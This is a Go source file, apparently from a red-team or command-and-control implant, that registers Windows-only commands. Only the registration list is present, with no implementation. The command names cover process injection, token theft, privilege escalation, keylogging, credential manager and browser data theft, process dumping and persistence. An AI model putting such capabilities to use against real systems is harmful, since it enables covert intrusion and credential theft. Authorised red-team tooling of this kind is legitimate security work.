//go:build windows

package commands

// registerPlatformCommands registers Windows-specific commands
func registerPlatformCommands() {
	RegisterCommand(&ReadMemoryCommand{})
	RegisterCommand(&WriteMemoryCommand{})
	RegisterCommand(&AutoPatchCommand{})
	RegisterCommand(&StartCLRCommand{})
	RegisterCommand(&InlineAssemblyCommand{})
	RegisterCommand(&InlineExecuteCommand{})
	RegisterCommand(&VanillaInjectionCommand{})
	RegisterCommand(&ThreadlessInjectCommand{})
	RegisterCommand(&MakeTokenCommand{})
	RegisterCommand(&StealTokenCommand{})
	RegisterCommand(&Rev2SelfCommand{})
	RegisterCommand(&TsCommand{})
	RegisterCommand(&ApcInjectionCommand{})
	RegisterCommand(&PoolPartyInjectionCommand{})
	RegisterCommand(&ScreenshotCommand{})
	RegisterCommand(&SpawnCommand{})
	RegisterCommand(&OpusInjectionCommand{})
	RegisterCommand(&RegReadCommand{})
	RegisterCommand(&RegWriteCommand{})
	RegisterCommand(&ClipboardCommand{})
	RegisterCommand(&PersistCommand{})
	RegisterCommand(&SchtaskCommand{})
	RegisterCommand(&ServiceCommand{})
	RegisterCommand(&NetEnumCommand{})
	RegisterCommand(&NetSharesCommand{})
	RegisterCommand(&WmiCommand{})
	RegisterCommand(&KeylogCommand{})
	RegisterCommand(&DrivesCommand{})
	RegisterCommand(&PowershellCommand{})
	RegisterCommand(&CredmanCommand{})
	RegisterCommand(&BrowserCommand{})
	RegisterCommand(&GetSystemCommand{})
	RegisterCommand(&LogonSessionsCommand{})
	RegisterCommand(&GetPrivsCommand{})
	RegisterCommand(&EnumTokensCommand{})
	RegisterCommand(&NamedPipesCommand{})
	RegisterCommand(&ProcdumpCommand{})
}
